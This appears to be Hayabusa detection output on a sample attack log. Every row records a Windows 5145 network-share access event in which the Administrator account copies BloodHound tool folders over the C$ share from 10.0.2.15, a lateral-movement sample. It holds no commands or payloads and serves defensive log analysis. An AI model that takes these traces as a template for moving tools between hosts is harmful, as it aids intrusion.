2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
